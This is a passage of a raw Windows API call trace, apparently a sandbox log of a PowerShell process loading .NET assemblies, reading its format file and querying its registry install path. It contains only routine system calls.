lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0078.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0078.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0078.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0078.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0078.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0078.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0078.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0078.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0078.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0078.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0078.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0078.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0078.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0078.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0078.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.568] VirtualQuery (in: lpAddress=0xcb820, lpBuffer=0xcc6e0, dwLength=0x30 | out: lpBuffer=0xcc6e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.569] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x18284e44, Data2=0x430a, Data3=0x4d6c, Data4=([0]=0xa1, [1]=0xd0, [2]=0x82, [3]=0x29, [4]=0x7f, [5]=0x5f, [6]=0xee, [7]=0xa6))) returned 0x0 [0078.571] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x7163df59, Data2=0x5352, Data3=0x4d86, Data4=([0]=0xb9, [1]=0x9a, [2]=0xfd, [3]=0xbe, [4]=0x21, [5]=0x1f, [6]=0xa4, [7]=0x5b))) returned 0x0 [0078.572] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.573] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.574] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x269ee9bc, Data2=0x2a9d, Data3=0x4ca6, Data4=([0]=0xae, [1]=0x28, [2]=0x65, [3]=0x46, [4]=0x96, [5]=0x5d, [6]=0x84, [7]=0x3a))) returned 0x0 [0078.578] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xdacdea4d, Data2=0xc7cd, Data3=0x47f6, Data4=([0]=0x8c, [1]=0x8a, [2]=0xb9, [3]=0xdd, [4]=0x82, [5]=0x95, [6]=0x9a, [7]=0xb7))) returned 0x0 [0078.578] VirtualQuery (in: lpAddress=0xcbc20, lpBuffer=0xccae0, dwLength=0x30 | out: lpBuffer=0xccae0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.579] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.579] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.580] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb4d66edc, Data2=0xe27f, Data3=0x4282, Data4=([0]=0xa1, [1]=0xf8, [2]=0xe0, [3]=0xb3, [4]=0x98, [5]=0x1c, [6]=0x79, [7]=0x13))) returned 0x0 [0078.580] VirtualQuery (in: lpAddress=0xcbc20, lpBuffer=0xccae0, dwLength=0x30 | out: lpBuffer=0xccae0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.580] VirtualQuery (in: lpAddress=0xcba40, lpBuffer=0xcc900, dwLength=0x30 | out: lpBuffer=0xcc900*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.581] VirtualQuery (in: lpAddress=0xcb290, lpBuffer=0xcc150, dwLength=0x30 | out: lpBuffer=0xcc150*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.582] VirtualQuery (in: lpAddress=0xcb290, lpBuffer=0xcc150, dwLength=0x30 | out: lpBuffer=0xcc150*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.582] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8010a5d0, Data2=0xfa11, Data3=0x4f81, Data4=([0]=0xbd, [1]=0xb9, [2]=0x3e, [3]=0xc3, [4]=0x20, [5]=0x69, [6]=0x6f, [7]=0x5b))) returned 0x0 [0078.583] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x13c63404, Data2=0xdf62, Data3=0x4c8c, Data4=([0]=0x91, [1]=0x38, [2]=0x6d, [3]=0x6c, [4]=0x6, [5]=0x9b, [6]=0x3c, [7]=0xb4))) returned 0x0 [0078.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.584] SetErrorMode (uMode=0x1) returned 0x1 [0078.584] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.584] GetFileType (hFile=0x310) returned 0x1 [0078.584] SetErrorMode (uMode=0x1) returned 0x1 [0078.584] GetFileType (hFile=0x310) returned 0x1 [0078.584] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.587] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.587] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.588] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.589] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.589] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.589] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.590] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.591] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.591] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.592] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.592] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.593] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.593] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.593] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.594] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.595] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.596] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0xbce, lpOverlapped=0x0) returned 1 [0078.596] ReadFile (in: hFile=0x310, lpBuffer=0x3535806, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3535806*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.596] ReadFile (in: hFile=0x310, lpBuffer=0x35360d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x35360d0*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.596] CloseHandle (hObject=0x310) returned 1 [0078.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.597] SetErrorMode (uMode=0x1) returned 0x1 [0078.597] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0078.597] SetErrorMode (uMode=0x1) returned 0x1 [0078.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.597] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.597] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.597] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0310 [0078.598] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0310, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.598] CoTaskMemFree (pv=0x1b8f0310) [0078.598] RegCloseKey (hKey=0x310) returned 0x0 [0078.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.604] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xfebac75a, Data2=0x3273, Data3=0x4c75, Data4=([0]=0x99, [1]=0xd6, [2]=0x7f, [3]=0x58, [4]=0x96, [5]=0x40, [6]=0xbb, [7]=0x32))) returned 0x0 [0078.605] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x167683d4, Data2=0xcde6, Data3=0x4e5e, Data4=([0]=0x8f, [1]=0x8, [2]=0x8c, [3]=0xe6, [4]=0x95, [5]=0x9e, [6]=0x2a, [7]=0xc8))) returned 0x0 [0078.605] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x127887e0, Data2=0xb09a, Data3=0x4e15, Data4=([0]=0xa2, [1]=0x96, [2]=0xdf, [3]=0x9c, [4]=0xd3, [5]=0x17, [6]=0x5d, [7]=0xc2))) returned 0x0 [0078.606] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb851fd46, Data2=0xc4f2, Data3=0x486a, Data4=([0]=0x8d, [1]=0xad, [2]=0x13, [3]=0x8f, [4]=0xc7, [5]=0x9d, [6]=0x35, [7]=0x86))) returned 0x0 [0078.606] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb23a0e32, Data2=0x8b80, Data3=0x4827, Data4=([0]=0xa5, [1]=0x3e, [2]=0xe6, [3]=0x81, [4]=0xc6, [5]=0x10, [6]=0xae, [7]=0xb5))) returned 0x0 [0078.606] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xea7be9e8, Data2=0xdc4c, Data3=0x461b, Data4=([0]=0xa1, [1]=0x16, [2]=0xd6, [3]=0x70, [4]=0x8, [5]=0x2d, [6]=0x25, [7]=0x1))) returned 0x0 [0078.607] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.607] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xc8127759, Data2=0xcd0e, Data3=0x4488, Data4=([0]=0xa8, [1]=0x25, [2]=0xc5, [3]=0xcd, [4]=0x33, [5]=0xeb, [6]=0x8a, [7]=0x92))) returned 0x0 [0078.608] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.608] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.609] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x13334d15, Data2=0x2e4b, Data3=0x4527, Data4=([0]=0x9d, [1]=0xf7, [2]=0x69, [3]=0x97, [4]=0xe3, [5]=0x1a, [6]=0xf1, [7]=0xad))) returned 0x0 [0078.609] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x5779294, Data2=0x82b0, Data3=0x44d1, Data4=([0]=0xa9, [1]=0x6a, [2]=0x1a, [3]=0x20, [4]=0xca, [5]=0x22, [6]=0x6e, [7]=0xfd))) returned 0x0 [0078.609] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8d28de62, Data2=0xcce1, Data3=0x48e3, Data4=([0]=0xb8, [1]=0x8d, [2]=0x47, [3]=0xd2, [4]=0xe6, [5]=0xa8, [6]=0xb1, [7]=0x53))) returned 0x0 [0078.610] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x69a015f6, Data2=0xdc9f, Data3=0x415d, Data4=([0]=0x81, [1]=0xa0, [2]=0x6a, [3]=0x98, [4]=0xec, [5]=0x57, [6]=0x64, [7]=0x93))) returned 0x0 [0078.610] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.610] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x75fa4866, Data2=0x441f, Data3=0x408e, Data4=([0]=0x84, [1]=0x6b, [2]=0xe0, [3]=0x28, [4]=0xf8, [5]=0x13, [6]=0x95, [7]=0x7b))) returned 0x0 